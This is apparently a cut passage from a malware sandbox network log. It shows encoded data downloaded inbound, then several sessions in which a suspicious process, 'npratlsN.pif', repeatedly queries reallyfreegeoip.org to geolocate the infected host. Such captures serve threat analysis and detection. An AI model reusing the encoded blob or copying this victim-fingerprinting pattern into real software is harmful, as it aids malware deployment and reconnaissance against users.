35 37 6a 32 44 6b 49 33 47 63 63 47 44 6c 33 2b Data Ascii: xQ8wY+Tqi6sI37cNVLpUZcFPCkGXBGCQmTTklhIJD+GMMWsrINIu0tnivRHrPeI+JsiEbTgEh7YWJBpGkcNnUd9EhxdBssckQuhqOynvHwmCcjwPIEqspn5gz7lFvOR1nY5jHf0dAX8tY1K/dKNeis6SZWiWxjankGBkR/UCIo+VUxVqT4EWyWpj03Gl9TDSnHWtkB6FSsVAH0Cx86RT7zjoZFsfJZ6APX5gDMcwE0EAeQ657j2DkI3GccGDl3+
2025-01-16 07:25:26 UTC	8000	IN	Data Raw: 6d 75 47 52 4e 77 65 50 69 42 51 5a 57 71 51 49 66 6f 45 30 32 44 32 52 66 4a 43 54 74 75 6b 64 31 6e 30 53 77 6e 63 66 77 38 52 46 6b 43 59 6f 79 78 66 7a 53 51 67 30 64 6b 6d 4c 4f 65 6e 67 32 4f 30 74 75 70 66 49 37 6b 37 52 6a 39 69 46 69 51 6b 47 73 6d 50 34 70 72 71 57 78 49 79 4b 63 6b 51 36 67 56 5a 32 2f 6a 2f 7a 64 74 43 4c 33 77 6b 64 56 38 78 44 56 37 44 33 59 48 58 62 6d 34 4a 64 54 35 48 49 56 75 34 53 4f 58 59 6f 49 36 79 75 39 54 78 6b 6c 4d 77 64 63 71 76 54 35 51 75 54 4a 5a 47 72 46 72 5a 4d 51 39 73 6e 7a 77 33 67 65 6e 51 2f 54 79 42 62 6b 79 42 68 45 48 50 67 6a 79 65 43 31 6f 74 44 58 64 42 4c 63 48 73 49 4f 79 6a 46 63 2b 4b 4b 6c 43 38 72 78 74 49 55 33 4f 67 36 30 32 4c 7a 61 6a 61 58 7a 53 66 4a 4e 62 46 72 53 4c 43 32 57 37 49 Data Ascii: muGRNwePiBQZWqQIfoE02D2RfJCTtukd1n0Swncfw8RFkCYoyxfzSQg0dkmLOeng2O0tupfI7k7Rj9iFiQkGsmP4prqWxIyKckQ6gVZ2/j/zdtCL3wkdV8xDV7D3YHXbm4JdT5HIVu4SOXYoI6yu9TxklMwdcqvT5QuTJZGrFrZMQ9snzw3genQ/TyBbkyBhEHPgjyeC1otDXdBLcHsIOyjFc+KKlC8rxtIU3Og602LzajaXzSfJNbFrSLC2W7I
2025-01-16 07:25:26 UTC	8000	IN	Data Raw: 4a 66 44 45 44 32 37 6d 32 4a 62 7a 41 42 73 6e 66 71 31 63 64 62 35 79 7a 47 37 66 6d 66 69 33 46 79 52 30 57 67 64 56 42 46 63 45 76 5a 31 4a 48 49 41 7a 6b 56 64 47 63 44 49 53 53 42 79 6d 64 69 6d 76 35 61 6c 32 44 58 4b 6f 6c 76 78 78 68 7a 52 38 35 64 79 68 55 74 77 44 35 39 6a 58 31 61 50 36 4f 31 31 42 66 42 65 4a 49 33 6c 47 49 42 6c 55 73 45 70 77 78 4a 69 5a 4f 4d 43 41 6b 4a 6c 50 4f 51 53 2b 59 46 34 38 68 79 55 6f 41 4d 4e 4c 72 56 48 2f 63 72 64 4e 59 58 6e 65 79 63 62 31 4f 6c 62 67 51 76 2f 4e 59 63 43 59 6b 69 75 7a 4d 61 78 4c 4e 70 2f 2b 51 4d 69 58 4b 56 6a 55 72 34 76 49 72 4b 45 75 34 33 6a 76 4b 6e 2b 39 45 59 36 33 31 74 70 32 61 4c 6c 76 56 54 45 5a 69 6f 64 75 6c 75 49 2b 66 4e 30 33 75 38 47 64 6c 74 6d 64 2f 46 62 4d 57 53 54 Data Ascii: JfDED27m2JbzABsnfq1cdb5yzG7fmfi3FyR0WgdVBFcEvZ1JHIAzkVdGcDISSBymdimv5al2DXKolvxxhzR85dyhUtwD59jX1aP6O11BfBeJI3lGIBlUsEpwxJiZOMCAkJlPOQS+YF48hyUoAMNLrVH/crdNYXneycb1OlbgQv/NYcCYkiuzMaxLNp/+QMiXKVjUr4vIrKEu43jvKn+9EY631tp2aLlvVTEZioduluI+fN03u8Gdltmd/FbMWST
2025-01-16 07:25:26 UTC	8000	IN	Data Raw: 37 47 45 55 6a 34 71 67 33 56 65 6e 4f 37 66 69 66 59 4b 6c 52 62 4d 6d 4c 31 34 34 78 61 41 6c 74 49 71 38 33 4e 51 75 4c 4f 72 72 78 4f 6a 34 74 59 30 37 4c 38 66 71 41 68 65 4f 6a 44 7a 73 47 53 43 43 57 67 37 55 69 45 71 39 48 56 39 7a 55 32 38 6f 4a 4c 72 68 61 54 2b 30 6f 52 30 6b 37 6c 36 32 65 6a 39 6c 43 64 74 46 66 50 64 71 67 4a 53 45 48 74 33 30 4e 44 43 70 48 63 5a 75 44 47 67 4c 68 75 50 57 57 66 79 6b 71 6a 4d 43 2b 43 50 73 52 55 68 50 52 31 70 54 6d 76 78 78 6a 49 52 4f 55 6c 78 58 6d 6f 55 44 55 6f 62 42 4e 43 44 2f 68 71 4a 6c 77 4e 6a 57 68 38 45 53 36 43 4d 77 4c 4d 41 6e 4b 75 6f 71 30 75 41 55 43 78 73 66 4d 53 4f 33 59 2f 72 52 61 4c 6c 57 64 31 78 73 2f 30 32 35 45 34 57 6c 6d 4a 78 4e 52 7a 4d 7a 53 4a 51 76 57 31 74 57 62 39 4d Data Ascii: 7GEUj4qg3VenO7fifYKlRbMmL144xaAltIq83NQuLOrrxOj4tY07L8fqAheOjDzsGSCCWg7UiEq9HV9zU28oJLrhaT+0oR0k7l62ej9lCdtFfPdqgJSEHt30NDCpHcZuDGgLhuPWWfykqjMC+CPsRUhPR1pTmvxxjIROUlxXmoUDUobBNCD/hqJlwNjWh8ES6CMwLMAnKuoq0uAUCxsfMSO3Y/rRaLlWd1xs/025E4WlmJxNRzMzSJQvW1tWb9M
2025-01-16 07:25:26 UTC	8000	IN	Data Raw: 36 70 52 56 46 39 63 6a 34 57 31 69 72 6c 53 59 6b 39 68 59 37 78 56 68 7a 36 59 78 74 44 58 34 53 44 37 59 48 6c 59 54 44 43 2b 49 6f 48 6f 74 69 4d 65 4d 4f 70 4c 6d 2b 70 74 4c 30 77 37 64 45 51 7a 45 73 78 33 75 31 76 6d 35 4e 7a 6b 65 72 38 67 63 70 6e 66 72 6e 59 49 7a 4a 38 50 6a 6d 79 6a 44 47 47 65 62 31 42 6c 72 2f 67 58 47 69 54 4b 74 46 6f 6a 77 31 6c 64 74 6c 6c 5a 78 71 34 50 34 4c 53 71 49 50 68 78 72 70 51 6d 67 73 4f 4f 76 4f 6c 4b 64 71 52 7a 59 54 45 30 62 39 52 63 6d 4f 45 35 6f 7a 49 67 47 41 69 61 4d 33 58 56 53 62 2f 64 72 62 4a 69 54 78 2f 47 71 47 55 79 51 6d 5a 33 64 62 76 49 63 51 7a 73 4f 7a 66 2b 6e 51 4c 78 47 74 49 41 6c 4d 59 66 79 6e 6a 6f 6a 37 62 4e 50 68 7a 6a 43 47 42 6c 4f 78 72 45 35 32 78 55 6f 30 45 44 53 63 7a 30 Data Ascii: 6pRVF9cj4W1irlSYk9hY7xVhz6YxtDX4SD7YHlYTDC+IoHotiMeMOpLm+ptL0w7dEQzEsx3u1vm5Nzker8gcpnfrnYIzJ8PjmyjDGGeb1Blr/gXGiTKtFojw1ldtllZxq4P4LSqIPhxrpQmgsOOvOlKdqRzYTE0b9RcmOE5ozIgGAiaM3XVSb/drbJiTx/GqGUyQmZ3dbvIcQzsOzf+nQLxGtIAlMYfynjoj7bNPhzjCGBlOxrE52xUo0EDScz0
2025-01-16 07:25:26 UTC	8000	IN	Data Raw: 34 38 5a 35 39 77 59 42 66 56 47 47 55 67 33 70 71 2f 44 62 38 76 54 4b 76 47 4d 53 41 30 58 57 59 47 45 72 54 70 76 31 55 45 79 51 6d 62 62 50 4a 39 36 42 72 76 39 6d 47 68 53 58 4e 33 4e 2f 32 76 6e 62 45 57 73 74 64 61 6e 52 33 34 62 6d 59 38 58 4d 37 43 74 41 32 33 39 6d 41 55 54 44 46 51 69 37 67 73 76 73 57 4a 69 53 6d 33 49 6b 49 39 49 48 61 32 39 77 4a 71 50 55 5a 54 41 4d 36 42 4d 5a 6c 75 58 34 67 2b 4b 75 6e 4b 59 68 32 2f 79 4e 46 4b 78 31 31 71 54 2b 36 75 39 2b 39 30 72 47 57 43 59 66 6a 68 43 67 47 4a 7a 5a 72 53 68 52 51 41 76 62 64 4b 54 64 73 39 44 31 6d 2b 4d 71 6e 2f 5a 66 7a 75 48 55 57 46 57 72 78 69 6b 62 36 52 34 7a 4e 42 41 78 4f 57 6c 58 4f 34 68 51 62 4f 38 71 6e 5a 6a 47 31 4d 71 76 57 2f 4d 52 42 6f 70 31 55 54 32 6a 56 65 4b Data Ascii: 48Z59wYBfVGGUg3pq/Db8vTKvGMSA0XWYGErTpv1UEyQmbbPJ96Brv9mGhSXN3N/2vnbEWstdanR34bmY8XM7CtA239mAUTDFQi7gsvsWJiSm3IkI9IHa29wJqPUZTAM6BMZluX4g+KunKYh2/yNFKx11qT+6u9+90rGWCYfjhCgGJzZrShRQAvbdKTds9D1m+Mqn/ZfzuHUWFWrxikb6R4zNBAxOWlXO4hQbO8qnZjG1MqvW/MRBop1UT2jVeK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49772	104.21.80.1	443	7716	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:25:34 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 07:25:35 UTC	853	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327124 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GITovgCc%2FSMOsZtqniARjmsiYCc2X3nqw7PDB1JR61q%2BAIn4BOl6FZg2ET9DTij2wQ79jEZNd2d3TbkqK05mAsFwU327RQXKHIsniP0Z7qmTAq8gowLFVhGKS1qElzVrDeQuMbSM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5f558e6c42d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1536&min_rtt=1526&rtt_var=592&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1818181&cwnd=229&unsent_bytes=0&cid=e33a8cd342a65874&ts=188&x=0"
2025-01-16 07:25:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49779	104.21.80.1	443	7716	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:25:35 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-16 07:25:35 UTC	853	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:35 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327124 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KLdnhtouhNyrMCeQRDTGN0TeyOAYBIaD5WamYeleAa04GnpyXtWGc2I9jLjbbehFa1DzXx6c3dFFJJkCmDS66nqTfQTuWwlVybs5mLdkpmgL1hJ8jIo%2FQ2AMuEOn%2B5ACgoB8cXdJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5f5ae9630f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1442&min_rtt=1435&rtt_var=553&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1950567&cwnd=231&unsent_bytes=0&cid=08b37bdb2ebac9e8&ts=138&x=0"
2025-01-16 07:25:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49792	104.21.80.1	443	7716	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:25:38 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 07:25:38 UTC	849	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:38 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327127 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vAcChhTZiodlVZux6ZJkpLTHl2XGdSlaEqNmx8UHAsUdEJGtEJo8qYqCGe2yUo0Ltkx6IpkPyg9DTXHrWDz0ZYBjoKTvVEH1AaOXh6G52elKriCcsUZEL2JlQjxDi4e4YO0ypHI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5f692e780f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1500&min_rtt=1489&rtt_var=566&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1961047&cwnd=231&unsent_bytes=0&cid=b3f0915402d0dbaa&ts=139&x=0"
2025-01-16 07:25:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49801	104.21.80.1	443	7716	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:25:39 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 07:25:39 UTC	851	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:39 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327128 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9uzjH8YmK5qqFkKgz62WMUqw2mhWZagwiAoWBhsEBJeBTvmoHPIrcCVW3z7s1gUdtFeFQN53WAAOFHZn2dHpODoIZK2LGzIkAR45UQL3QhfAvQP%2BfGUEOkcBDeEfyczlC3C5rzex"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5f71682f8c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1944&rtt_var=737&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1476238&cwnd=223&unsent_bytes=0&cid=3d8ced7999d9a6a7&ts=142&x=0"
2025-01-16 07:25:39 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49814	104.21.80.1	443	7716	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:25:40 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-16 07:25:40 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:40 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327129 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nCIzCxky6p6hHb1XODcZfEkdfyiM%2BfhWbfm9hfuNF1W6hXHu7sVcVZpjRk53ZsRGsZfyo0P9YntiZ4RRlZfin%2BwCC1seycSymH%2Bxnb%2BlEZ7%2BQpDUg7SU7t4AaktAJkyblpCrCCRC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5f7998e143ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1655&rtt_var=636&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1698662&cwnd=228&unsent_bytes=0&cid=37ec739fbf521b37&ts=152&x=0"
2025-01-16 07:25:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49827	104.21.80.1	443	7716	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:25:42 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-16 07:25:42 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:42 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327131 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=30qhszY8kPAl2xZLZikmZFEw76DUvS%2F1i9t5FPFP%2BuZ%2FJ59hKSHwdJDxEgT2Pmt6txzTIbHTKdChkkduPhKMNTOuslXf22y9rggp97yzYbGbLatW4Df9ZS9uIG2ayrdIlRSmHLeH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5f821cb943ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1685&min_rtt=1679&rtt_var=642&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1686886&cwnd=228&unsent_bytes=0&cid=1f8ea20dfeb0bfbe&ts=136&x=0"
2025-01-16 07:25:42 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49835	104.21.80.1	443	7716	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:25:43 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 07:25:43 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:43 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327132 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FORG2rwjK19ubWFODY7JP6tkhuEiaqDTdXevtTBYAUoFqOHQMI1APNqpYKfftedu%2FNaP5J50g0Gtxi2zdjWgJSLElLGgttEiGM9ziYTu39b%2FTaZWNvHTlRWjzRKMON4vtkdiezZz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5f8ac9f30f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1463&min_rtt=1456&rtt_var=560&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1931216&cwnd=231&unsent_bytes=0&cid=12db3ba5b20207c4&ts=132&x=0"
2025-01-16 07:25:43 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: 